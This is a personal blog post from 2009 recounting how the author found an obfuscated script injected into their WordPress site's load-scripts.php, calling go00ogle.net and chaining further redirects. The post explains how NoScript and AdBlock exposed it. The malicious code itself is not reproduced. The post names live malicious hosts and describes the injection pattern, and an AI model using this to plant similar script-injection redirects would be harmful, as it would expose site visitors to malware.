Has your web site ever been “infected”?
This happened to me today, first time in my life. Hello from go00ogle.net. Below are technical details on what exactly happened, why I did not suffer any damage, and what I recommend to do in order to reduce your own susceptibility. The article is written for a non-technical reader.
How did I see that something is wrong?
Administering my another blog today, I have noticed something in my web browser which I did not see before: the icon of NoScript (a Firefox add-on) was showing, that some scripts are blocked from execution. That is the small blue “S” with an even smaller red circle in the Firefox information bar, shown on the picture to the left.
NoScript stops the browser from executing scripts, which are parts of the web pages we are browsing. It is a common practice nowadays to call scripts from other hosts than the one where the web page itself is hosted. NoScript by default blocks such calls and shows the red icon. Click it, and you see which hosts the web page has tried to call. I whitelisted my own host shemyak.com, but I knew for sure that my blog should not call any scripts from host such as go00ogle.net.
This is an indication that my host is doing something I did not ask him to.
How did I find what was it?
The easiest thing nowadays is to type the question into the search engine. Google.com does not (at the moment of this writing) show anything helpful about go00ogle.com, except couple of links to forums where the latter is called scam site. But “google safe browsing” itself identifies the almost-namesake as “suspicious”, and claims it “has hosted malicious software” as of 15.6.2009 (yesterday). Not much real information, at least yet.
Let’s look into the source ourselves. The source of my “problematic” page does not contain string “go00ogle” anywhere. So, the call to this site is done from some other script, called by this page.
Their location can be found from the page source, but it’s even easier with the other security and privacy tool, AdBlock. Its window shows list of all “items” on the page – images, styles, scripts and embedded objects. Cool, I see the script about which the NoScript informed me, and also two other scripts which were always there.
Which of the two is the source of the problem? Thanks AdBlock, I can just block them one by one and see if NoScript still complains about blocking go00ogle.net. It turns out that the second one is “infected”, the first is not.
Let’s now explore “the bad” script. I copy its location and download it with wget:
$ wget -O infected-script 'http://www.konstantin.shemyak.com/dnevnik/wp-admin/load-scripts.php?c=0&load=jquery,utils,quicktags&ver=b64ae9a301a545332f1fcd4c6c5351b4'
And open it with a text editor. The suspect is there! Here is the piece of code “calling home” in the line number 20:
The URL go00ogle.net is obfuscated (I do not see a reason why the author of this script took his/her time to do it). The result of the execution is that the browser gets the following instruction:
And the default behavior of the browser would be to execute this script. Good that NoScript changes it.
What could happen if I had not used the prevention measures?
Let’s see, what is inside that go00ogle.net/if.php:
So it’s a redirect to another script. It may also roll up a counter for “surinamefoto.com”. Unwrapping what comes from trafing.net, I saw two other redirects, again with possible roll-ups of counters. I lost the interest for hunting it down further and a) submitted a support ticket to my hosting provider b) informed WordPress community about the issue (I was not the first victim there).
It’s that simple. Just use tools like AdBlock and NoScript. The first is the “blacklist”-type filter (specifically prohibiting items which you know you do not want – works great for advertising banners and counters you do not need), the second is “whitelist” (prohibiting by default everything, except items you have explicitly asked). By default, your browser may be executing any code – even coming from places you never asked for. This is probably not a good idea, so do not use a web browser for which you can’t easily disable the insecure behavior.